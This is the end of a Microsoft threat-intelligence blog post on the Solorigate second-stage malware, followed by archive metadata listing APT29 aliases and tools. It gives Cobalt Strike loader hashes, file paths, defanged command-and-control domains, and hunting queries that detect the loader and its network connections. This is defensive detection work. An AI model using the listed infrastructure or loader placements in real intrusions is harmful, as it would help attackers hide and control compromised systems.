Security operations teams looking to get a comprehensive guide on\r\ndetecting and investigating Solorigate can refer to Using Microsoft 365 Defender to protect against Solorigate.\r\nMeanwhile, security administrators can use the recommendations for hardening networks against Solorigate and similar\r\nsophisticated cyberattacks outlined in Increasing resilience against Solorigate and other sophisticated attacks with\r\nMicrosoft Defender.\r\nTo get the latest information and guidance from Microsoft, visit https://aka.ms/solorigate.\r\nMicrosoft 365 Defender Research Team\r\nMicrosoft Threat Intelligence Center (MSTIC)\r\nMicrosoft Cyber Defense Operations Center (CDOC)\r\nIndicators of compromise (IoCs)\r\nCustom Cobalt Strike Beacon loader (SHA-256):\r\n118189f90da3788362fe85eafa555298423e21ec37f147f3bf88c61d4cd46c51\r\n1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 17 of 
21\n\n1ec138f21a315722fb702706b4bdc0f544317f130f4a009502ec98345f85e4ad\r\n2a276f4b11f47f81dd2bcb850a158d4202df836769da5a23e56bf0353281473e\r\n327f1d94bc26779cbe20f8689be12c7eee2e390fbddb40b92ad00b1cddfd6426\r\n3985dea8e467c56e8cc44ebfc201253ffee923765d12808aaf17db2c644c4c06\r\n557f91404fb821d7c1e98d9f2f5296dc12712fc19c87a84602442b4637fb23d4\r\n5cf85c3d18cd6dba8377370883a0fffda59767839156add4c8912394f76d6ef0\r\n5f8650ca0ed22ad0d4127eb4086d4548ec31ad035c7aec12c6e82cb64417a390\r\n674075c8f63c64ad5fa6fd5e2aa6e4954afae594e7b0f07670e4322a60f3d0cf\r\n6ff3a4f7fd7dc793e866708ab0fe592e6c08156b1aa3552a8d74e331f1aea377\r\n7c68f8d80fc2a6347da7c196d5f91861ba889afb51a4da4a6c282e06ef5bdb7e\r\n915705c09b4bd108bcd123fe35f20a16d8c9c7d38d93820e8c167695a890b214\r\n948bfdfad43ad52ca09890a4d2515079c29bdfe02edaa53e7d92858aa2dfbe4c\r\n955609cf0b4ea38b409d523a0f675d8404fee55c458ad079b4031e02433fdbf3\r\nb348546f4c6a9bcafd81015132f09cf8313420eb653673bf3d65046427b1167f\r\nb35e0010e0734fcd9b5952ae93459544ae33485fe0662fae715092e0dfb92ad3\r\nb820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07\r\nbe9dbbec6937dfe0a652c0603d4972ba354e83c06b8397d6555fd1847da36725\r\nc5a818d9b95e1c548d6af22b5e8663a2410e6d4ed87df7f9daf7df0ef029872e\r\nc741797dd400de5927f8b5317165fc755d6439749c39c380a1357eac0a00f90c\r\nc7924cc1bc388cfcdc2ee2472899cd34a2ef4414134cbc23a7cb530650f93d98\r\nc96b7a3c9acf704189ae8d6124b5a7b1f0e8c83c246b59bc5ff15e17b7de4c84\r\ncbbe224d9854d6a4269ed2fa9b22d77681f84e3ca4e5d6891414479471f5ca68\r\ncdd9b4252ef2f6e64bccc91146ec5dc51d94e2761184cd0ffa9909aa739fa17e\r\ndbd26ccb3699f426dc6799e218b91d1a3c1d08ad3006bc2880e29c755a4e2338\r\ne60e1bb967db273b922deeea32d56fc6d9501a236856ef9a3e5f76c1f392000a\r\nf2d38a29f6727f4ade62d88d8a68de0d52a0695930b8c92437a2f9e4de92e418\r\nf61a37aa8581986ba600286d65bb76100fb44e347e253f1f5ad50051e5f882f5\r\nf81987f1484bfe5441be157250b35b0a2d7991cf9272fa4eacd3e9f0dee235de\r\nFile paths for the custom Cobalt Strike Beacon 
loader:\r\nC:\\Windows\\ms\\sms\\sms.dll\r\nC:\\Windows\\Microsoft.NET\\Framework64\\sbscmp30.dll\r\nC:\\Windows\\AUInstallAgent\\auagent.dll\r\nC:\\Windows\\apppatch\\apppatch64\\sysmain.dll\r\nC:\\Windows\\Vss\\Writers\\Application\\AppXML.dll\r\nC:\\Windows\\PCHEALTH\\health.dll\r\nC:\\Windows\\Registration\\crmlog.dll\r\nC:\\Windows\\Cursors\\cursrv.dll\r\nC:\\Windows\\AppPatch\\AcWin.dll\r\nC:\\Windows\\CbsTemp\\cbst.dll\r\nC:\\Windows\\AppReadiness\\Appapi.dll\r\nC:\\Windows\\Panther\\MainQueueOnline.dll\r\nC:\\Windows\\AppReadiness\\AppRead.dll\r\nC:\\Windows\\PrintDialog\\PrintDial.dll\r\nC:\\Windows\\ShellExperiences\\MtUvc.dll\r\nC:\\Windows\\PrintDialog\\appxsig.dll\r\nC:\\Windows\\DigitalLocker\\lock.dll\r\nC:\\Windows\\assembly\\GAC_64\\MSBuild\\3.5.0.0__b03f5f7f11d50a3a\\msbuild.dll\r\nC:\\Windows\\Migration\\WTR\\ctl.dll\r\nC:\\Windows\\ELAMBKUP\\WdBoot.dll\r\nC:\\Windows\\LiveKernelReports\\KerRep.dll\r\nC:\\Windows\\Speech_OneCore\\Engines\\TTS\\en-US\\enUS.Name.dll\r\nC:\\Windows\\SoftwareDistribution\\DataStore\\DataStr.dll\r\nC:\\Windows\\RemotePackages\\RemoteApps\\RemPack.dll\r\nC:\\Windows\\ShellComponents\\TaskFlow.dll\r\nCobalt Strike Beacon (command-and-control domains):\r\naimsecurity[.]net\r\ndatazr[.]com\r\nervsystem[.]com\r\nfinancialmarket[.]org\r\ngallerycenter[.]org\r\ninfinitysoftwares[.]com\r\nmobilnweb[.]com\r\nolapdatabase[.]com\r\nswipeservice[.]com\r\ntechiefly[.]com\r\nAdvanced hunting queries\r\nA collection of Advanced Hunting Queries (AHQ) related to Solorigate is located in our AHQ repository in GitHub. To locate possible exploitation activity related to the contents of this blog, you can run the following advanced hunting queries via Microsoft Defender for Endpoint:\r\nAnomalous usage of 7zip\r\nLook for anomalous usage or running process of 7zip.
Run query in Microsoft Defender for Endpoint.\r\nDeviceProcessEvents\r\n| where InitiatingProcessFileName in~(\"rundll32.exe\", \"dllhost.exe\")\r\nand InitiatingProcessCommandLine != \"\"\r\nand InitiatingProcessCommandLine !contains \" \"\r\n| extend RundllTime = Timestamp\r\n| join DeviceProcessEvents on $left.DeviceId == $right.DeviceId\r\n// After the join, the right-side columns carry the suffix 1; the left side is already restricted to rundll32/dllhost,\r\n// so the 7zip conditions and the time difference must refer to the right-side (suffixed) columns.\r\n| where InitiatingProcessFileName1 hasprefix \"7z\"\r\nor InitiatingProcessCommandLine1 has \"-mx9\"\r\n| extend DateDiff = datetime_diff(\"day\", Timestamp1, RundllTime)\r\n| where DateDiff \u003c 2\r\nPresence of custom Cobalt Strike\r\nLook for presence of custom Cobalt Strike loaders. Run query in Microsoft Defender for Endpoint.\r\nDeviceProcessEvents\r\n| where FileName =~ \"rundll32.exe\"\r\n| where InitiatingProcessIntegrityLevel in (\"High\", \"System\")\r\n| where ProcessCommandLine matches regex @'(?i)rundll32\\s+c\\:\\\\windows(\\\\[^\\\\]+)+\\.dll\\s+[a-zA-Z0-9_]{3,}'\r\nCommand and control\r\nLook for command-and-control connections. Run query in Microsoft Defender for Endpoint.\r\nDeviceNetworkEvents\r\n| where InitiatingProcessParentFileName =~ \"rundll32.exe\"\r\n| where InitiatingProcessFileName =~ \"dllhost.exe\"\r\nand InitiatingProcessCommandLine != \"\"\r\nand InitiatingProcessCommandLine !contains \" \"\r\nLook for network connections to known command and control domains.
Run query in Microsoft Defender for Endpoint.\r\nDeviceNetworkEvents\r\n| where RemoteUrl in~('aimsecurity.net',\r\n'datazr.com',\r\n'ervsystem.com',\r\n'financialmarket.org',\r\n'gallerycenter.org',\r\n'infinitysoftwares.com',\r\n'mobilnweb.com',\r\n'olapdatabase.com',\r\n'swipeservice.com',\r\n'techiefly.com')\r\nSource: https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/"
	],
	"report_names": [
		"deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop"
	],
	"threat_actors": [
		{
			"id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba",
			"created_at": "2022-10-25T16:07:24.36191Z",
			"updated_at": "2026-04-10T02:00:04.954902Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"Dark Halo",
				"Nobelium",
				"SolarStorm",
				"StellarParticle",
				"UNC2452"
			],
			"source_name": "ETDA:UNC2452",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89",
			"created_at": "2022-10-25T15:50:23.739197Z",
			"updated_at": "2026-04-10T02:00:05.275809Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"UNC2452",
				"NOBELIUM",
				"StellarParticle",
				"Dark Halo"
			],
			"source_name": "MITRE:UNC2452",
			"tools": [
				"Sibot",
				"Mimikatz",
				"Cobalt Strike",
				"AdFind",
				"GoldMax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a241a1ca-2bc9-450b-a07b-aae747ee2710",
			"created_at": "2024-06-19T02:03:08.150052Z",
			"updated_at": "2026-04-10T02:00:03.737173Z",
			"deleted_at": null,
			"main_name": "IRON RITUAL",
			"aliases": [
				"APT29",
				"Blue Dev 5 ",
				"BlueBravo ",
				"Cloaked Ursa ",
				"CozyLarch ",
				"Dark Halo ",
				"Midnight Blizzard ",
				"NOBELIUM ",
				"StellarParticle ",
				"UNC2452 "
			],
			"source_name": "Secureworks:IRON RITUAL",
			"tools": [
				"Brute Ratel C4",
				"Cobalt Strike",
				"EnvyScout",
				"GoldFinder",
				"GoldMax",
				"NativeZone",
				"RAINDROP",
				"SUNBURST",
				"Sibot",
				"TEARDROP",
				"VaporRage"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "70872c3a-e788-4b55-a7d6-b2df52001ad0",
			"created_at": "2023-01-06T13:46:39.18401Z",
			"updated_at": "2026-04-10T02:00:03.239111Z",
			"deleted_at": null,
			"main_name": "UNC2452",
			"aliases": [
				"DarkHalo",
				"StellarParticle",
				"NOBELIUM",
				"Solar Phoenix",
				"Midnight Blizzard"
			],
			"source_name": "MISPGALAXY:UNC2452",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434811,
	"ts_updated_at": 1775792252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a8440c5ab81f56ad010d64479dc9007c203eab1c.pdf",
		"text": "https://archive.orkl.eu/a8440c5ab81f56ad010d64479dc9007c203eab1c.txt",
		"img": "https://archive.orkl.eu/a8440c5ab81f56ad010d64479dc9007c203eab1c.jpg"
	}
}